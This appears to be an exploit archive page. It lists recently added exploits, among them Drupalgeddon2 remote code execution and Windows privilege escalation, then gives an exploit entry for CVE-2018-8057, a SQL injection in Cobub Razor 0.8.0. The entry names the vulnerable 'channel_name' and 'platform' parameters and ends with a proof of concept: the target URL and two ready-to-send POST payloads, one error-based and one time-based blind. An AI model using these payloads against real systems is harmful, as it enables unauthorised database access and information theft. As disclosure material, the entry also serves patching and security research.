
12 changes to exploits/shellcodes Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017) Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039) D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
28 lines
No EOL
1 KiB
Text
28 lines
No EOL
1 KiB
Text
# Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability
|
||
# Date: 2018-04-16
|
||
# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
|
||
# Vendor Homepage: http://www.cobub.com/
|
||
# Software Link: https://github.com/cobub/razor
|
||
# Version: 0.8.0
|
||
# CVE : CVE-2018-8057
|
||
|
||
|
||
|
||
The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
|
||
|
||
|
||
Code source:
|
||
/application/controllers/manage/channel.php at line 75-95
|
||
|
||
|
||
The SQL injection type: error-based and AND/OR time-based blind
|
||
Parameter: channel_name,platform
|
||
|
||
|
||
PoC:
|
||
|
||
|
||
http://localhost/index.php?/manage/channel/addchannel
|
||
POST data:
|
||
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
|
||
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1 |